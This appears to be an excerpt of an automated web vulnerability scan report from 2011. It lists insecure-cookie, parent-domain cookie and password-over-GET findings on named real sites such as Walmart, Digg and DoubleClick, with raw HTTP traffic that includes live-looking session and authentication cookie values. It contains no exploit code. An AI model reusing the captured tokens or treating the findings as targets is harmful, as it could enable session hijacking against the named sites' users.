                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Vogue HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:20 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000077AvQ5emcOSox5imPZuSXqf:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:00 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fAM%0a7ZiVQobgmG6AiURqTuhruWAd40Qhy2PGdMvGtTU6F1PZxSPdsjjJkMU9jkcblHU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29758


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_W HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29935


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Wired HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:36 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29856


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

9. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

10. Cookie scoped to parent domain  previous  next
There are 27 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.43things.com/person/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.43things.com
Path:   /person/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...

10.2. http://www.admob.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.admob.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...

10.3. http://www.walmart.com/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Wed, 12 Jan 2011 15:26:32 GMT
Expires: Wed, 12 Jan 2011 15:26:32 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:33 GMT
Content-Length: 11881
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Via: HTTP/1.1 nw307 (nw307_7330869248_73610240)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css"
...[SNIP]...

10.4. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=ctst

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 62

CN.ad.lotame.tags={"Profile": {"Audiences": {"Audience":[]}}};

10.5. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&_dc_ck=try HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT
Date: Tue, 11 Jan 2011 13:27:09 GMT
Server: GFE/2.0
Expires: Tue, 11 Jan 2011 13:27:09 GMT

GIF89a.............!.......,...........L..;

10.6. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 844
Set-Cookie: id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 03:23:26 GMT
Expires: Wed, 12 Jan 2011 03:23:26 GMT
Connection: close

document.write('<!-- BEGIN DIMESTORE TAG -->\n');

var projectid = 2621;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B2347
...[SNIP]...

10.7. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;233079667;13533154;h?http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart
Set-Cookie: id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT
Date: Wed, 12 Jan 2011 03:24:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.8. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.intel.com/consumer/products/processors/corei5.htm?dfaid=1&crtvid=39900309
Set-Cookie: id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:23:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.9. http://ad.insightexpressai.com/adserver/adServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/adServer.aspx?publisherID=338 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:04:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIControlCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBannerCounter170474=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:04:02 GMT
Connection: close
Content-Length: 9

//170474

10.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=2127270684&c7=http%3A%2F%2Fdownload.cnet.com%2F8301-2007_4-20027809-12.html%3Ftag%3Dmncol%3Btitle&c8=Android%20lands%20cloud%20security%20from%20Trend%20Micro%20%7C%&c9=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.11. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
